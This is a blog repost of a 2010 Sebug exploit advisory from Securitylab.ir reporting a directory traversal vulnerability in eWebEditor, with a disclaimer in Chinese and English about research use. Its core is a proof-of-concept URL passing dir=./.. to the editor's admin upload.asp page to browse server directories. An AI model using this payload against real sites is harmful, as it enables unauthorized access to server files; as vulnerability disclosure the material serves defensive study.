包罗万象--好东西要收藏--共享无限: eWebEditor suffers from a directory traversal vulnerability

eWebEditor suffers from a directory traversal vulnerability

2010年2月5日星期五 | | |

SSV ID:19034

SEBUG-Appdir:eWebEditor

Published:2010-01-30

Exploit:

[www.sebug.net]
The following procedures (methods) may contain something offensive，they are only for security researches and teaching , at your own risk!

#################################################################  # Securitylab.ir  #################################################################  # Application Info:  # Name: eWebeditor  # Version: all version  #################################################################  # Vulnerability Info:  # Type: Directory Traversal  # Risk: Medium  #################################################################  # Vulnerability:  # http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..  #################################################################  # Discoverd By: Pouya Daneshmand  # Website: http://securitylab.ir  # Contacts: info[at]securitylab.ir & [email protected]  ###################################################################

// sebug.net [2010-01-30]

http://sebug.net/exploit/19034/

谢谢光临本站: http://home.benz.la 共享无限..再次申明 : 此代码含危险性,,请勿从事非法活动.

我的QQ空间